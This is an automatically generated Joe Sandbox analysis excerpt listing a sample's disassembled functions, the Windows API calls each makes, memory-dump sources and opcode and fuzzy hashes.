                                    Similarity
                                    • API ID: MessagePostSleep$RectWindow
                                    • String ID:
                                    • API String ID: 3382505437-0
                                    • Opcode ID: 5c38bdacc0e1e9082b7e952baa8a7b9966000972e2406617a3a0f7594defd8a3
                                    • Instruction ID: 7d96b4056d9e68155e54a126185f1ae940d68819d7e87ab6c50e51b9bb5b9823
                                    • Opcode Fuzzy Hash: 5c38bdacc0e1e9082b7e952baa8a7b9966000972e2406617a3a0f7594defd8a3
                                    • Instruction Fuzzy Hash: AF31C071504229EFDF14CFA8D94CA9E3BB5FB04315F10822AF925EA2D0C7B09A54DB91
                                    Function 008DB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindowVisible.USER32(?), ref: 008DB204
                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 008DB221
                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 008DB259
                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 008DB27F
                                    • _wcsstr.LIBCMT ref: 008DB289
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                    • String ID:
                                    • API String ID: 3902887630-0
                                    • Opcode ID: ac315be9ac16bbe863e646f78230df74658a8f6fbae76e1a18271d17151369a6
                                    • Instruction ID: e539965006ec7f65cb9955db8fe129cf2a65022bc3bd2b761a78b1947c46a07f
                                    • Opcode Fuzzy Hash: ac315be9ac16bbe863e646f78230df74658a8f6fbae76e1a18271d17151369a6
                                    • Instruction Fuzzy Hash: A1212933204204BBEB255B79DC49E7F7B9CEF4A760F01423AF804DA261EF61DC41A661
                                    Function 0090B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0090B192
                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0090B1B7
                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0090B1CF
                                    • GetSystemMetrics.USER32(00000004), ref: 0090B1F8
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,008F0E90,00000000), ref: 0090B216
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$Long$MetricsSystem
                                    • String ID:
                                    • API String ID: 2294984445-0
                                    • Opcode ID: 77589d2913124f25c8e298fac82d7909584b41e903a34610f0cf9eb89f26568a
                                    • Instruction ID: 21aecef96c106263de201b1770f1e3a5e80c427d6904e4a57b53b5243def98b0
                                    • Opcode Fuzzy Hash: 77589d2913124f25c8e298fac82d7909584b41e903a34610f0cf9eb89f26568a
                                    • Instruction Fuzzy Hash: B521B571928251AFCB209F78DC14A6A37A8FB15721F114B38FD32D76E1E7309950DB90
                                    Function 008D9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008D9320
                                      • Part of subcall function 00887BCC: _memmove.LIBCMT ref: 00887C06
                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008D9352
                                    • __itow.LIBCMT ref: 008D936A
                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008D9392
                                    • __itow.LIBCMT ref: 008D93A3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: MessageSend$__itow$_memmove
                                    • String ID:
                                    • API String ID: 2983881199-0
                                    • Opcode ID: 65568ff8a6c0da0dc12169b0d56a043f03641c86aca78b01bd117d0f3b57de2c
                                    • Instruction ID: 96c46a8ceadb89d80edcaab9b282f59c91a26ff45b8d047c611095867e88376d
                                    • Opcode Fuzzy Hash: 65568ff8a6c0da0dc12169b0d56a043f03641c86aca78b01bd117d0f3b57de2c
                                    • Instruction Fuzzy Hash: 2A210731700208AFDB24AA648C85EAE7BADFB89714F145126F984D73C0D6B0CD419792
                                    Function 008F5A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindow.USER32(00000000), ref: 008F5A6E
                                    • GetForegroundWindow.USER32 ref: 008F5A85
                                    • GetDC.USER32(00000000), ref: 008F5AC1
                                    • GetPixel.GDI32(00000000,?,00000003), ref: 008F5ACD
                                    • ReleaseDC.USER32(00000000,00000003), ref: 008F5B08
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$ForegroundPixelRelease
                                    • String ID:
                                    • API String ID: 4156661090-0
                                    • Opcode ID: 583dc8fe2691bceff55df2476ff33575c626d46e4eb21797522649e54b5c6061
                                    • Instruction ID: d4e119dfe50d8ff6ceef5fd15a74a0f03f949b000d4673af4179c55e29081207
                                    • Opcode Fuzzy Hash: 583dc8fe2691bceff55df2476ff33575c626d46e4eb21797522649e54b5c6061
                                    • Instruction Fuzzy Hash: 6321A135A00118EFDB10EF69DC84AAABBE5FF48310F148079F949D7762CA70AD00DB91
                                    Function 008812F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                    Download Yara Rule
                                    APIs
                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0088134D
                                    • SelectObject.GDI32(?,00000000), ref: 0088135C
                                    • BeginPath.GDI32(?), ref: 00881373
                                    • SelectObject.GDI32(?,00000000), ref: 0088139C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ObjectSelect$BeginCreatePath
                                    • String ID:
                                    • API String ID: 3225163088-0
                                    • Opcode ID: b2954ab6096b51ad52a8658df2ec50c56310668ea3d1cbb2a5cf06a42716c033
                                    • Instruction ID: a3034a55fc2da37dc145e8261d8b4cef93b4f5cd711aa3b0ddb7fee2b541900b
                                    • Opcode Fuzzy Hash: b2954ab6096b51ad52a8658df2ec50c56310668ea3d1cbb2a5cf06a42716c033
                                    • Instruction Fuzzy Hash: 0A219034828608EFDF20AFA5DD08B697BA8FB11321F154216F814D67B1DF749992EF90
                                    Function 008DBC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memcmp
                                    • String ID:
                                    • API String ID: 2931989736-0
                                    • Opcode ID: 2fce90d801bc42aa4f2da5a553562d26cc7f3f2a6680b5e13eed9894955a9a1b
                                    • Instruction ID: 735bb0030cb1faf47d2bd66766f8a30322d71241b23f3da95c47e8ccbc18159d
                                    • Opcode Fuzzy Hash: 2fce90d801bc42aa4f2da5a553562d26cc7f3f2a6680b5e13eed9894955a9a1b
                                    • Instruction Fuzzy Hash: EF018071741209BAE6047B299D42FFBA35DFF5538CF054122FE05D6342EB60DE2083A9
                                    Function 008E4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 008E4ABA
                                    • __beginthreadex.LIBCMT ref: 008E4AD8
                                    • MessageBoxW.USER32(?,?,?,?), ref: 008E4AED
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 008E4B03
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 008E4B0A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                    • String ID:
                                    • API String ID: 3824534824-0
                                    • Opcode ID: b4ef41d84227913f5b03cd499953d60109475f2129a43f31b3e124aa7eb7fb98
                                    • Instruction ID: 5dd10100c8cf044e832c5c624a73c4390029cdb7a2e6b20831cf2ea567c338e0
                                    • Opcode Fuzzy Hash: b4ef41d84227913f5b03cd499953d60109475f2129a43f31b3e124aa7eb7fb98
                                    • Instruction Fuzzy Hash: F311087691C658BFC7109FE99C08E9B7FACFB46320F154266F828D3351D6B1C90497A0
                                    Function 008D8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008D821E
                                    • GetLastError.KERNEL32(?,008D7CE2,?,?,?), ref: 008D8228
                                    • GetProcessHeap.KERNEL32(00000008,?,?,008D7CE2,?,?,?), ref: 008D8237
                                    • RtlAllocateHeap.NTDLL(00000000,?,008D7CE2), ref: 008D823E
                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008D8255
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                    • String ID:
                                    • API String ID: 883493501-0
                                    • Opcode ID: fb8e16d4c09777ff33cf5f9312ee9cc6f948f4c3f258567e10895834fe1cc98b
                                    • Instruction ID: 64c57eedcb97ace822787a863888b2ee3e5415c0c3a8cdec5629750b32b8bf85
                                    • Opcode Fuzzy Hash: fb8e16d4c09777ff33cf5f9312ee9cc6f948f4c3f258567e10895834fe1cc98b
                                    • Instruction Fuzzy Hash: 24016D71218608FFDB208FA5DC59D6B7BBDFF8A755B50056AF809C2220DA329D40DA60
                                    Function 008D710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CLSIDFromProgID.COMBASE ref: 008D7127
                                    • ProgIDFromCLSID.COMBASE(?,00000000), ref: 008D7142
                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008D7044,80070057,?,?), ref: 008D7150
                                    • CoTaskMemFree.COMBASE(00000000), ref: 008D7160
                                    • CLSIDFromString.COMBASE(?,?), ref: 008D716C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                    • String ID:
                                    • API String ID: 3897988419-0
                                    • Opcode ID: ab9f3e509ccc78677c61bd15f7c35e551cd0815239b7e8f95fef4c5584051df4
                                    • Instruction ID: 4f74ab90ff1f205fd6cf8d5d368ac255c0a2930ee48367851e53c4f7c30dcd64
                                    • Opcode Fuzzy Hash: ab9f3e509ccc78677c61bd15f7c35e551cd0815239b7e8f95fef4c5584051df4
                                    • Instruction Fuzzy Hash: 7B017C72615219AFDF218F64DC44AAA7BADFB447A1F144265FD05D2320E731DE40ABA0
                                    Function 008E5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E5260
                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 008E526E
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E5276
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 008E5280
                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E52BC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                    • String ID:
                                    • API String ID: 2833360925-0
                                    • Opcode ID: aafdb54d08c660129331b1d6c4c64d39636f1e369eb515ddd26712348dbf82f8
                                    • Instruction ID: 3d0264591a90a7cdd6b0506417fe72d831f6fb79291145f4376fc534a3cd52fd
                                    • Opcode Fuzzy Hash: aafdb54d08c660129331b1d6c4c64d39636f1e369eb515ddd26712348dbf82f8
                                    • Instruction Fuzzy Hash: 30012931D19A1DDBCF10EFE5E8599EDBB78FB0E715F400156EA41F2240CB3096549BA1
                                    Function 008D810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008D8121
                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008D812B
                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D813A
                                    • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 008D8141
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D8157
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                                    • String ID:
                                    • API String ID: 47921759-0
                                    • Opcode ID: 6e017a27038e6f7eeae9f455af5fb568fbf766a4864499aeceb75b3541f13297
                                    • Instruction ID: d8d2ea7141167aafa8ad1458464aee4bb405756d824bc8bd18e753dc2e458cc2
                                    • Opcode Fuzzy Hash: 6e017a27038e6f7eeae9f455af5fb568fbf766a4864499aeceb75b3541f13297
                                    • Instruction Fuzzy Hash: F6F06271214314EFEB220FA5EC99F673BBCFF49B54F000126F945C6250CB619E45EA60
                                    Function 008DC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDlgItem.USER32(?,000003E9), ref: 008DC1F7
                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 008DC20E
                                    • MessageBeep.USER32(00000000), ref: 008DC226
                                    • KillTimer.USER32(?,0000040A), ref: 008DC242
                                    • EndDialog.USER32(?,00000001), ref: 008DC25C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                    • String ID:
                                    • API String ID: 3741023627-0
                                    • Opcode ID: 8f99dcd0552c4f96abfe4704e86512c09313034a0e293c3349bea786d190a707
                                    • Instruction ID: a765f1ac59a361cd4bdf2603e757f6493f6584cbd80ac4bd5b308b708fcddffc
                                    • Opcode Fuzzy Hash: 8f99dcd0552c4f96abfe4704e86512c09313034a0e293c3349bea786d190a707
                                    • Instruction Fuzzy Hash: 6001A7304587099BEB315B54DD5EB967778FB00B06F04076AE542D15E0D7E16944DB50
                                    Function 008813B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                    Download Yara Rule
                                    APIs
                                    • EndPath.GDI32(?), ref: 008813BF
                                    • StrokeAndFillPath.GDI32(?,?,008BB888,00000000,?), ref: 008813DB
                                    • SelectObject.GDI32(?,00000000), ref: 008813EE
                                    • DeleteObject.GDI32 ref: 00881401
                                    • StrokePath.GDI32(?), ref: 0088141C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                    • String ID:
                                    • API String ID: 2625713937-0
                                    • Opcode ID: 1e675b3241b044e03eafeb3d119a9815d547ef63858ae7053bb501a3c6d3c042
                                    • Instruction ID: 61ffb1ea42a4d7cb5f47f0d753f791a49df9f1273d8e7e0932c3680d76ac38c6
                                    • Opcode Fuzzy Hash: 1e675b3241b044e03eafeb3d119a9815d547ef63858ae7053bb501a3c6d3c042
                                    • Instruction Fuzzy Hash: 91F0CD34028608DFDB215F56EC5CB583BA9F702326F098224E42989AF2CB354596EF54
                                    Function 008D8992 Relevance: 7.5, APIs: 5, Instructions: 23memorysynchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 008D899D
                                    • CloseHandle.KERNEL32(?), ref: 008D89B2
                                    • CloseHandle.KERNEL32(?), ref: 008D89BA
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 008D89C3
                                    • HeapFree.KERNEL32(00000000), ref: 008D89CA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                                    • String ID:
                                    • API String ID: 3751786701-0
                                    • Opcode ID: 5fd11a196b21a6896ba2a884260528a47f40ee199e95884236d9d0c8ddf35f8d
